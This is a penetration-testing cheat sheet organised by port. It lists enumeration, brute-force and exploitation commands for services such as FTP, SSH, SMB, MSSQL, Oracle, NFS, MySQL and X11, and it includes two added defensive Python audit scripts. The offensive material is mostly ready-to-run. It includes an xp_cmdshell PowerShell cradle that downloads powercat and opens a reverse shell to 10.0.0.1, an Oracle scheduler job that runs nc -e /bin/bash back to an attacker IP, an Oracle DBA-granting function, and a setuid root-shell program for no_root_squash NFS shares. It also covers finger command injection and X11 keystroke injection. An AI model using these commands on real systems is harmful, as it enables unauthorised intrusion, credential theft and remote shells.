Joined Adversary Simulation Manual

Services

7 - Echo

nc -uvn <IP> 7
Hello echo    #This is what you send
Hello echo    #This is the response

21 - FTP

Fingerprint

telnet <IP> 21
use auxiliary/scanner/ftp/ftp_version

Anonymous access

ftp <IP>
> anonymous
> anonymous
> ls -ab
> binary
> ascii
> bye
nmap -sV --script ftp-anon -p 21 <IP>

Brute Force

hydra -t 1 -l admin -P /root/Desktop/password.lst -vV <IP> ftp
nmap -sV --script ftp-brute -p 21 <IP>
use auxiliary/scanner/ftp/ftp_login

FTP Bounce Port Scanner

nmap -sV --script ftp-bounce -p 21 <IP>
use auxiliary/scanner/portscan/ftpbounce

Configuration files

  • ftpusers

  • ftp.conf

  • proftpd.conf

22 - SSH

Fingerprint/Enumerate

telnet <IP> 22    # banner grab
use auxiliary/scanner/ssh/ssh_version
nmap --script ssh2-enum-algos -p 22 -n <IP>
nmap --script ssh-hostkey -p 22 -n <IP> --script-args ssh_hostkey=full
nmap --script sshv1 -p 22 -n <IP>

Brute Force

hydra -l root -p admin <IP> -t 4 ssh
use auxiliary/scanner/ssh/ssh_login

Configuration files

  • ssh_config

  • sshd_config

  • authorized_keys

  • ssh_known_hosts

  • .shosts

23 - Telnet

Fingerprint

telnet <IP>
nmap -p 23 <ip> --script telnet-encryption
use auxiliary/scanner/telnet/telnet_version

Brute Force

hydra -L usernames.txt -P passwords.txt <IP> telnet -V
nmap -p 23 --script telnet-brute --script-args userdb=<myusers.lst>,passdb=<mypwds.lst>,telnet-brute.timeout=8s <IP>
use auxiliary/scanner/telnet/telnet_login
# Solaris 10+
telnet -l "-froot" hostname

Configuration files

  • /etc/inetd.conf

  • /etc/xinetd.d/telnet

  • /etc/xinetd.d/stelnet

25, 587 - SMTP

Fingerprint / SASL Methods

telnet <IP> 25
> ehlo me
openssl s_client -connect <IP>:25 -starttls smtp
> ehlo me
nmap --script smtp-commands.nse [--script-args smtp-commands.domain=<domain>] -pT:25,465,587 <IP>
use auxiliary/scanner/smtp/smtp_version

Enumerate users

VRFY username
EXPN username
nmap --script smtp-enum-users.nse [--script-args smtp-enum-users.methods={EXPN,...},...] -p 25,465,587 <IP>
use auxiliary/scanner/smtp/smtp_enum

Brute Force

nmap -p 25 --script smtp-brute <IP>

Open Mail Relay

HELO me
MAIL FROM: test@testdomain.com
RCPT TO: my_email@example.com
DATA 
Subject: This is a test mail 
From: Test User
To: Test Target
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
This is a test email for you to read.
.
QUIT
nmap -v --script=smtp-open-relay -p 25 <IP>
use auxiliary/scanner/smtp/smtp_relay

53 - DNS

DNS Enumeration

use auxiliary/gather/dns_srv_enum
use auxiliary/gather/enum_dns
nmap --script=dns-service-discovery -p 5353 <IP>
nmap --script=broadcast-dns-service-discovery <IP>
nmap --script dns-blacklist --script-args='dns-blacklist.ip=<ip>'
nmap -sSU -p 53 --script dns-nsid <IP>
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='example.com'"

Zones/Zone Transfer

nmap -sn -Pn ns1.example.com --script dns-check-zone --script-args='dns-check-zone.domain=example.com'
nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=<domain>

Recursion

nmap -sU -p 53 --script=dns-recursion <IP>
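
The check behind the dns-recursion script, written out so you can audit your own resolvers for open recursion (a resolver that recurses for anyone is also the raw material for the amplification attacks scanned for further down). This is an added example, not code from the original page: it sends a query with the RD flag set and reads the RA flag and RCODE from the reply. The sample reply is constructed inline so the parsing runs offline; check_resolver() needs network access to a server you are authorised to test.

```python
# Added example (not from the original page): manual DNS open-recursion check.
import socket
import struct
import sys

DEFAULT_TXID = 0x1234


def build_query(name, txid=DEFAULT_TXID, qtype=1):
    """Build a DNS query for `name` (A record by default) with RD=1."""
    flags = 0x0100  # QR=0, opcode 0, RD (recursion desired) set
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.strip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", qtype, 1)  # class IN


def parse_response(data, txid=DEFAULT_TXID):
    """Return the header fields relevant to the recursion check."""
    if len(data) < 12:
        raise ValueError("truncated DNS header")
    rid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    if rid != txid:
        raise ValueError("transaction id mismatch")
    return {
        "qr": bool(flags & 0x8000),     # reply, not a query
        "rd": bool(flags & 0x0100),     # our RD flag echoed back
        "ra": bool(flags & 0x0080),     # server advertises recursion
        "rcode": flags & 0x000F,        # 0 = NOERROR, 5 = REFUSED
        "answers": an,
    }


def is_open_recursive(resp):
    """True when the server advertises recursion and actually resolved the name."""
    return resp["qr"] and resp["ra"] and resp["rcode"] == 0 and resp["answers"] > 0


def check_resolver(server, name="www.example.com", timeout=3.0):
    """Send the probe over UDP/53 and evaluate the reply (network access required)."""
    query = build_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, (server, 53))
        data, _ = sock.recvfrom(4096)
    return is_open_recursive(parse_response(data))


def sample_response(recursive, name="www.example.com", txid=DEFAULT_TXID):
    """Constructed replies for offline testing.

    An open resolver answers QR=1 RD=1 RA=1, NOERROR, with one A record
    (203.0.113.10, a documentation address); a closed one answers RA=0,
    REFUSED, with no answer section.
    """
    question = build_query(name, txid)[12:]
    if recursive:
        flags, an = 0x8180, 1
        # name pointer to offset 12, type A, class IN, TTL 300, 4-byte rdata
        answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([203, 0, 113, 10])
    else:
        flags, an = 0x8105, 0
        answer = b""
    return struct.pack("!HHHHHH", txid, flags, 1, an, 0, 0) + question + answer


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target:
        print(f"{target}: open recursion = {check_resolver(target)}")
    else:
        for label, reply in (("open", sample_response(True)), ("closed", sample_response(False))):
            print(label, parse_response(reply), is_open_recursive(parse_response(reply)))
```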

DNS Lookup

host <Domain>
nslookup <Domain>  [server]
nslookup -type=ns <Domain>
dig [-4 | -6 ] @<Server> <Domain> <Type>
fierce -dns <domain>
python 
>>> import socket
>>> socket.gethostbyname('www.google.com')
use auxiliary/gather/dns_info

Reverse DNS Lookup

dig [-4 | -6 ] -x <IP>
nslookup -type=ns <IP>
dnsrecon -r <startIP-endIP>
whois <IP> | grep -E "Creation|Created|Registration|created|Expiration|Expires|Email"
use auxiliary/gather/dns_reverse_lookup

Brute Force

nmap --script dns-brute www.example.com -sn -n -Pn
use auxiliary/gather/dns_bruteforce

DNS Amplification Scanner

use auxiliary/scanner/dns/dns_amp

DNS Non-Recursive Record Scraper

nmap -sU -p 53 --script dns-cache-snoop.nse <IP>
use auxiliary/gather/dns_cache_scraper

Configuration Files

  • host.conf

  • resolv.conf

  • named.conf

69 - TFTP

Enumeration

tftp <IP> PUT local_file
tftp <IP> GET conf.txt (or other files)

# Solarwinds TFTP server
tftp -i <IP> GET /etc/passwd    # old Solaris

Bruteforcing

use auxiliary/scanner/tftp/tftpbrute

79 - Finger

User enumeration

finger root example.com
finger 'a b c d e f g h' @example.com
finger admin@example.com
finger user@example.com
finger 0@example.com
finger .@example.com
finger **@example.com
finger test@example.com
finger @example.com
nmap -sV -sC <target>
use auxiliary/scanner/finger/finger_users

Command execution

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

finger user@host@victim
finger @internal@external

Funny Bit

Weather forecast

finger london@graph.no

80, 8080, 443 - Web Ports

Too much to be listed here: These are not the droids you are looking for.

  • Web

88 - Kerberos

Enumerate Users

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='test'" <IP>

110 - POP3

Enumeration

nmap -sV -sC <IP>
use auxiliary/scanner/pop3/pop3_version

Brute Force

nmap -sV --script=pop3-brute <IP>
use auxiliary/scanner/pop3/pop3_login

Retrieve email

telnet <IP> 110
> USER admin@<IP>
> PASS admin

# List all emails
> list

# Retrieve email number 5, for example
> retr 5

111 - Portmapper

Enumerate RPC-based services

rpcinfo <IP>
rpcinfo -p <IP>
nmap -sSUC -p111 <IP>

RPCBind + NFS

Check for NFS mounts via the portmapper on port 111

rpcinfo -p <IP>
use auxiliary/scanner/nfs/nfsmount
  • https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc

113 - Ident

Enumeration

nmap -sV -sC <IP>

119 - NNTP Network News Transfer Protocol

Enumeration

nmap -p 119,433,563 --script nntp-ntlm-info <IP>

Brute Force

use auxiliary/scanner/nntp/nntp_login

123 - NTP

Enumeration

nmap -sU -p 123 --script ntp-info <IP>
nmap -sU -p 123 --script ntp-monlist.nse <IP>
ntpq <IP>
> lpeers
> version
> readlist
> host
> hostname
> ntpversion
ntpdc -c monlist <IP>
ntpdc -c sysinfo <IP>

Mode 6 Query

ntpq -c rv <IP>

Configuration files

  • ntp.conf

135-139, 445 - NetBIOS

Enumeration

net view \\<IP>
use auxiliary/scanner/smb/smb_version
nbtscan -r 192.168.1.1/24
enum4linux -a <IP>
nmap --script=broadcast-netbios-master-browser <IP>
nmap --script=msrpc-enum <IP>
use exploit/windows/dcerpc/ms03_026_dcom

Domain

nmblookup -A <DC_IP>

SMB/Samba shares

smbclient -L 10.10.10.10
smbclient //10.10.10.10/tmp
smbclient \\\\10.10.10.10\\ipc$ -U bob
smbclient //10.10.10.10/ipc$ -U bob

Null Session

net use \\<IP>\ipc$ "" /u:""
smbclient //TYPHOON/typhoon -I <IP> -N

Connecting with PSExec

use exploit/windows/smb/psexec

Configuration Files

  • smb.conf

  • lmhosts

135, 593 - Microsoft Windows RPC Services and Microsoft RPC Services over HTTP

Enumeration

Endpoint Mapper Service Discovery
    use auxiliary/scanner/dcerpc/endpoint_mapper
Hidden DCERPC Service Discovery
    use auxiliary/scanner/dcerpc/hidden
Remote Management Interface Discovery
    use auxiliary/scanner/dcerpc/management
DCERPC TCP Service Auditor
    use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
rpcdump.py <IP>

161 - SNMP

Enumeration

nmap  -Pn -sU -p 161 --script=snmp-brute <IP>
nmap  -Pn -sU -p 161 --script=snmp-interfaces <IP>

Available nse scripts:

    snmp-brute.nse
    snmp-hh3c-logins.nse
    snmp-info.nse
    snmp-interfaces.nse
    snmp-ios-config.nse
    snmp-netstat.nse
    snmp-processes.nse
    snmp-sysdescr.nse
    snmp-win32-services.nse
    snmp-win32-shares.nse
    snmp-win32-software.nse
    snmp-win32-users.nse
snmpwalk -v <Version> -c <Community string> <IP>

Default Community Strings

        public
        private
        community
use auxiliary/scanner/snmp/snmp_enum

Bruteforce

onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <IP>
for i in $(cat /usr/share/doc/onesixtyone/dict.txt); do echo -n "$i :"; snmpget -v 3 -u $i udp6:[<IPv6>] 1.3.6.1.2.1.1.4.0;  done
use auxiliary/scanner/snmp/snmp_login

Configuration files

  • snmp.conf

  • snmpd.conf

  • snmp-config.xml

264 - Check Point FireWall-1 Topology

Enumeration

use auxiliary/gather/checkpoint_hostname

389, 636 - LDAP

Enumeration

nmap -p 389 --script ldap-rootdse <IP>
ldapsearch -LLL -x -H ldap://<domain fqdn> -b '' -s base '(objectclass=*)'
ldapsearch -h <IP> -p 389 -x -s base -b '' "(objectClass=*)" "*" +
ldapsearch -h <IP> -p 389 -x -b "dc=example,dc=com"
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=users,ldap.attrib=sAMAccountName' <IP>

Brute force

nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' <ip>

Configuration Files

  • General

    • containers.ldif

    • ldap.cfg

    • ldap.conf

    • ldap.xml

    • ldap-config.xml

    • ldap-realm.xml

    • slapd.conf

  • IBM SecureWay V3 server

    • V3.sas.oc

  • Microsoft Active Directory server

    • msadClassesAttrs.ldif

  • Netscape Directory Server 4

    • nsslapd.sas_at.conf

    • nsslapd.sas_oc.conf

  • OpenLDAP directory server

    • slapd.sas_at.conf

    • slapd.sas_oc.conf

  • Sun ONE Directory Server 5.1

    • 75sas.ldif

500/1723 - PPTP/L2TP/VPN

Aggressive mode

ike-scan <IP> -M -A --id=123

Testing process would go as follows:

  • Scan for the IKE service

  • Enumerate transform sets and confirm Aggressive Mode support

  • Run IKEForce in enum mode to obtain a valid group name or ID

  • Obtain a valid hash using IKE-Scan

  • Crack the hash using OCLHashcat

  • Run IKEForce in brute mode to obtain valid XAUTH credentials

  • Authenticate using chosen client

  • Pwn to your heart's content

enumerate id

Test 1

ike-scan
python ikeforce.py <IP> -a
python ikeforce.py <IP> -e -t x x x x -w ./wordlists

Test 2

ike-scan -M <IP>
ike-scan -M <IP> -A
ike-scan -M <IP> -A --auth=65001
for i in $(cat /root/groups.txt); do echo | tee -a /root/vpn_test; echo "Testing: $i" | tee -a /root/vpn_test && ike-scan -M <IP> -A --auth=65001 --id=$i | tee -a /root/vpn_test; done
grep "Handshake returned" -B2 /root/vpn_test
ike-scan -M <IP> -A --auth=65001 --id=ID -P/tmp/psk
psk-crack -d /usr/share/wordlists/metasploit/unix_passwords.txt /tmp/psk

502 - Modbus

Discover

nmap --script modbus-discover.nse --script-args='modbus-discover.aggressive=true' -p 502 <IP>

512 - rexec

Access

rlogin <IP>

Brute Force

nmap -p 512 --script rexec-brute <IP>
use auxiliary/scanner/rservices/rexec_login

513 - rlogin

Enumeration

Find the files
    find / -name .rhosts
    locate .rhosts
Examine Files
    cat .rhosts
Subvert the files
    echo ++ > .rhosts

Manual Login

rlogin -l username <IP>
rlogin <IP>

Brute force

nmap -p 513 --script rlogin-brute <ip>
hydra -L usernames.txt -P passwords.txt <IP> rlogin -V
use auxiliary/scanner/rservices/rlogin_login

514 - rsh

Enumeration

rsh <IP> <Command>

Brute force

hydra -L usernames.txt rsh://<IP> -v -V
use auxiliary/scanner/rservices/rsh_login

548 - AFP - Apple Filing Protocol

Enumeration

nmap -sV -sC <IP>
nmap -sS -sV -p 548 --script=afp-ls <IP>
nmap -sV --script=afp-showmount <IP>
nmap -sV --script=afp-path-vuln <IP>
use auxiliary/scanner/afp/afp_server_info

Brute force

nmap -p 548 --script afp-brute <IP>

554, 8554 - RTSP

Enumeration

nmap -p 8554 -sV --script rtsp-methods <IP> 
nmap -p 554 --script rtsp-methods <ip>

Brute Force

nmap -p 554 --script rtsp-url-brute  <ip>

873 - Rsync

Enumeration

nmap -p 873 --script=rsync-list-modules <IP>
use auxiliary/scanner/rsync/modules_list

1099 - Java RMI

Enumeration

use auxiliary/scanner/misc/java_rmi_server

Notable Exploits

Java RMI Server Insecure Default Configuration Java Code Execution

use exploit/multi/misc/java_rmi_server

Default configuration of rmiregistry allows loading classes from remote URLs

nmap --script=rmi-vuln-classloader -p 1099 <IP>

1433, 1434 - SQL Server

Metasploit

Queries the MSSQL instance for information

use auxiliary/scanner/mssql/mssql_ping

Default passwords

use auxiliary/scanner/mssql/mssql_login

Microsoft SQL Server Configuration Enumerator

use auxiliary/admin/mssql/mssql_enum

Microsoft SQL Server xp_cmdshell Command Execution

use auxiliary/admin/mssql/mssql_exec
EXEC xp_cmdshell 'powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://10.0.0.1:8080/powercat.ps1");powercat -c 10.0.0.1 -p 443 -e cmd'

Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration

use auxiliary/admin/mssql/mssql_enum_domain_accounts

Microsoft SQL Server Find and Sample Data

use auxiliary/admin/mssql/mssql_findandsampledata

Microsoft SQL Server Generic Query

use auxiliary/admin/mssql/mssql_sql

MSSQL Schema Dump

use auxiliary/scanner/mssql/mssql_schemadump

Others

use auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli
use auxiliary/admin/mssql/mssql_enum_sql_logins
use auxiliary/admin/mssql/mssql_escalate_dbowner
use auxiliary/admin/mssql/mssql_escalate_dbowner_sqli
use auxiliary/admin/mssql/mssql_escalate_execute_as
use auxiliary/admin/mssql/mssql_escalate_execute_as_sqli
use auxiliary/admin/mssql/mssql_idf
use auxiliary/admin/mssql/mssql_ntlm_stealer
use auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
use auxiliary/admin/mssql/mssql_sql_file
use auxiliary/analyze/jtr_mssql_fast
use auxiliary/scanner/mssql/mssql_hashdump

Hacking SQL Server Stored Procedures

  • https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/

  • https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/

  • https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/

  • https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/

1494 - Citrix

Enumeration

1521 - Oracle

Oracle Enumeration

use auxiliary/scanner/oracle/tnslsnr_version
use auxiliary/scanner/oracle/sid_enum

Brute Force

nmap

nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560 <IP>
nmap --script=oracle-sid-brute -p 1521-1560 <IP>
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL <IP>
nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL <IP>
nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 <IP>

odat

./odat-libc2.5-x86_64 sidguesser -s <IP>
./odat-libc2.5-x86_64 passwordguesser -d XE -s <IP>

metasploit

use auxiliary/scanner/oracle/oracle_login
use auxiliary/scanner/oracle/sid_brute

PrivEsc

select * from session_privs;
select banner from v$version where banner like 'Oracle%';

Create function:

CREATE OR REPLACE FUNCTION GETDBA_mine(FOO varchar) return varchar deterministic authid current_user is pragma autonomous_transaction;
begin
execute immediate 'grant dba to myuser identified by myuser';
commit;
return 'FOO';
End;

Create index:

create index exploit_index_mine on SYS.DUAL(SCOTT.GETDBA_mine('BAR'));
select user from sys.dual;

LOGIN WITH NEW USER - VIA RAZORSQL

select * from session_privs;

Start listener on Kali:

nc -lnvp 9999

Create job:

begin
  dbms_scheduler.create_job(job_name => 'TESTX', job_type => 'EXECUTABLE',
    job_action => '/bin/nc', number_of_arguments => 4,
    start_date => SYSTIMESTAMP, enabled => FALSE, auto_drop => TRUE);
  dbms_scheduler.set_job_argument_value('TESTX', 1, 'KALI_IP');
  dbms_scheduler.set_job_argument_value('TESTX', 2, '9999');
  dbms_scheduler.set_job_argument_value('TESTX', 3, '-e');
  dbms_scheduler.set_job_argument_value('TESTX', 4, '/bin/bash');
  dbms_scheduler.enable('TESTX');
end;

SQL Injection References

  • http://pentestmonkey.net/category/cheat-sheet/sql-injection

  • https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/

  • https://securiteam.com/securityreviews/5DP0N1P76E

2049 - NFS

Enumeration

showmount -e <hostname/IP>
mount -t nfs <IP>:/directory_found_exported /local_directory

no_root_squash

Case 1:

#include <unistd.h>

int main(void) {
    setgid(0); setuid(0);
    execl("/bin/sh", "sh", (char *)0);
    return 0;
}

# compiled binary placed on the share exported with no_root_squash, as root:
chown root.root ./pwnme
chmod u+s ./pwnme

Case 2:

cp /bin/bash local_shell
cat local_shell > spawn_root_shell
chmod 4777 !$
./spawn_root_shell -p

Configuration Files

  • /etc/exports

  • /etc/lib/nfs/xtab
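
An audit of /etc/exports for the settings the no_root_squash section above relies on (no_root_squash, insecure, wildcard clients with rw). This is an added example, not code from the original page; the exports content is a constructed sample, and the parser follows the exports(5) layout of one path followed by client(option,...) specs.

```python
# Added example (not from the original page): flag risky entries in /etc/exports.
import re
import shlex

# Constructed sample /etc/exports content for demonstration.
SAMPLE_EXPORTS = """\
# shares
/srv/backup   10.0.0.0/24(rw,sync,no_root_squash)
/srv/public   *(ro,sync)
/home         *.lab.example(rw,no_subtree_check,insecure,no_root_squash) 10.0.0.5(ro)
/srv/secure   10.0.0.7(rw,root_squash,sync)
"""

# client spec: optional host part, optional parenthesised option list
_CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return a list of (path, client, [options]) tuples from exports text."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = shlex.split(line)  # handles quoted paths containing spaces
        path, clients = parts[0], parts[1:]
        if not clients:
            clients = ["*"]  # exports(5): no client spec means every host
        for spec in clients:
            m = _CLIENT_RE.match(spec)
            client = m.group(1) or "*"
            opts = [o for o in (m.group(2) or "").split(",") if o]
            entries.append((path, client, opts))
    return entries


def findings_for(path, client, opts):
    """Findings for one export entry; defaults are ro and root_squash."""
    found = []
    wildcard = client.startswith("*")  # "*" or "*.domain"
    if "no_root_squash" in opts:
        found.append(f"{path} -> {client}: no_root_squash (remote root is not mapped to nobody)")
    if "insecure" in opts:
        found.append(f"{path} -> {client}: insecure (requests from unprivileged source ports accepted)")
    if wildcard and "rw" in opts:
        found.append(f"{path} -> {client}: read-write for a wildcard client")
    elif wildcard:
        found.append(f"{path} -> {client}: exported to a wildcard client")
    return found


def audit_exports(text):
    """All findings for an exports file, in file order."""
    findings = []
    for path, client, opts in parse_exports(text):
        findings.extend(findings_for(path, client, opts))
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_EXPORTS):
        print(finding)
```

To audit a real host, pass the contents of its /etc/exports to audit_exports().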

2301, 2381 - Compaq/HP Insight Manager

Enumeration

nmap -sV -p 2301,2381 <IP>

Configuration Files

  • path.properties

  • mx.log

  • CLIClientConfig.cfg

  • database.props

  • pg_hba.conf

  • jboss-service.xml

  • .namazurc

3260 - ISCSI

Enumeration

nmap -sV -p 3260 --script=iscsi-info <IP>

Exploitation

  • https://www.pentestpartners.com/security-blog/an-interesting-route-to-domain-admin-iscsi/

3306 - MySQL

Enumeration

nmap -A -n -p3306 <IP>
nmap -A -n -Pn --script=all -p3306 <IP>
telnet <IP> 3306
use test; select * from test;
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_hashdump
mysql -u root -p -h <IP>

Quick testing

mysql -h <IP> -u root
mysql -h <IP> -u root
mysql -h <IP> -u root@localhost
mysql -h <IP>
mysql -h <IP> -u ""@localhost

Brute Force

use auxiliary/scanner/mysql/mysql_login

Privilege Escalation

Current Level of access
    mysql> select user();
    mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
Access passwords
    mysql> use mysql
    mysql> select user,password from user;
Create a new user and grant him privileges
    mysql>create user test identified by 'test';
    mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to mysql identified by 'mysql' WITH GRANT OPTION;
Break into a shell
    mysql> \! cat /etc/passwd
    mysql> \! bash

Configuration Files

  • windows

    • config.ini

      • my.ini

    • windows\my.ini

    • winnt\my.ini

      • /mysql/data/

  • unix

    • my.cnf

      • /etc/my.cnf

      • /etc/mysql/my.cnf

      • /var/lib/mysql/my.cnf

      • ~/.my.cnf

      • /etc/my.cnf

  • Command History

    • ~/.mysql.history

  • Log Files

    • connections.log

    • update.log

    • common.log

3389 - RDesktop

Network level auth NLA

nmap -p 3389 --script rdp-enum-encryption <IP>

Brute Force

ncrack -vv --user Administrator -P /root/passwords.txt rdp://192.168.1.101

5000+ - Sybase

Enumeration

5060 - SIP

Enumeration

nc <IP> 5060

Configuration Files

  • SIPDefault.cnf

  • asterisk.conf

  • sip.conf

  • phone.conf

  • sip_notify.conf

  • .cfg

  • 000000000000.cfg

  • phone1.cfg

  • sip.cfg etc. etc.

5432 - Postgresql

Enumeration

use auxiliary/scanner/postgres/postgres_version

Brute Force

use auxiliary/scanner/postgres/postgres_login

Exploitation

PostgreSQL 9.0, 9.1, and 9.2

use auxiliary/scanner/postgres/postgres_dbname_flag_injection
  • https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9

5555 - HPDataProtector

RCE

use exploit/multi/misc/hp_data_protector_exec_integutil

5900^ - VNC

Enumeration

use auxiliary/scanner/vnc/vnc_none_auth
Scan 5900 and up for direct access, 5800 for HTTP access.

Brute Force

use auxiliary/scanner/vnc/vnc_login

Password Attacks

Registry Locations
    \HKEY_CURRENT_USER\Software\ORL\WinVNC3
    \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
Decryption Key
    0x238210763578887

Default location where the VNC password is stored

~/.vnc/passwd

Configuration Files

  • .vnc

  • /etc/vnc/config

  • $HOME/.vnc/config

  • /etc/sysconfig/vncservers

  • /etc/vnc.conf

5984 - CouchDB

Enumeration

curl http://<IP>:5984/
curl -X GET http://<IP>:5984/_all_dbs
curl -X GET http://user:password@<IP>:5984/_all_dbs
curl -X GET http://<IP>:5984/{dbname}/_all_docs
curl -X GET http://<IP>:5984/{dbname}/{id}

6000^ - X11

Enumeration

nmap -p 6000 --script=x11-access <IP> -nvvv
use auxiliary/scanner/x11/open_x11

Screenshots

xwd -display <IP>:0 -root -out screenshot.xwd

If image is black, kill screensaver:

xwininfo -root -children -display <IP>:0
xkill -display 192.168.X.209:0 -id 0x3200001 # 0x3200001 = "gnome-screensaver"

Keyboard Command Injection

Manual

export DISPLAY=<IP>:0
xdotool type "id"
xdotool key KP_Enter
xdotool type "clear && history () bash && history"
xdotool key KP_Enter

Metasploit

use exploit/unix/x11/x11_keyboard_exec

Sniff the keyboard keystrokes

xspy <IP>

Configuration Files

  • /etc/Xn.hosts

  • /usr/lib/X11/xdm

  • Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +"

  • /usr/lib/X11/xdm/xsession

  • /usr/lib/X11/xdm/xsession-remote

  • /usr/lib/X11/xdm/xsession.0

  • /usr/lib/X11/xdm/xdm-config

  • DisplayManager*authorize:on

6379 - Redis

Enumeration

nmap -p 6379 --script redis-info <IP>
use auxiliary/scanner/redis/redis_server
use auxiliary/scanner/redis/redis_login
use auxiliary/scanner/redis/file_upload

Exploitation

  • https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html

9001, 9030 - Tor

Enumeration

nmap --script=tor-consensus-checker <IP>

9100 - PJL - Jet Direct

Enumeration

nmap -p 9100 --script=pjl-ready-message.nse -n  <IP>
use auxiliary/scanner/printer/printer_version_info

9160 - Apache Cassandra

Enumeration

nmap -p 9160 -n --script=cassandra-info <IP>

Brute Force

nmap -p 9160 -n --script=cassandra-brute <IP>

10000 - NDMP -Network Data Management Protocol

Enumeration

nmap -sV <IP>
nmap -p 10000 --script ndmp-fs-info -n <IP>

11211 - Memcache

Enumeration

nmap -p 11211 --script memcached-info <IP>
telnet <IP> 11211

27017, 27018 - MongoDB

Enumeration

nmap -p 27017 -sV --script mongodb-info <IP>
nmap -p 27017 -sV --script mongodb-databases.nse <IP>

Brute Force

nmap 10.169.xx.xx -p 27017 -sV --script mongodb-brute -n
use auxiliary/scanner/mongodb/mongodb_login

44818 - EthernetIP-TCP-UDP

Enumeration

nmap -p 44818 -n --script enip-enumerate -Pn <IP>

47808 - UDP BACNet

Enumeration

nmap -sU -p 47808 -n -vvv --script BACnet-discover-enumerate --script-args full=yes <IP>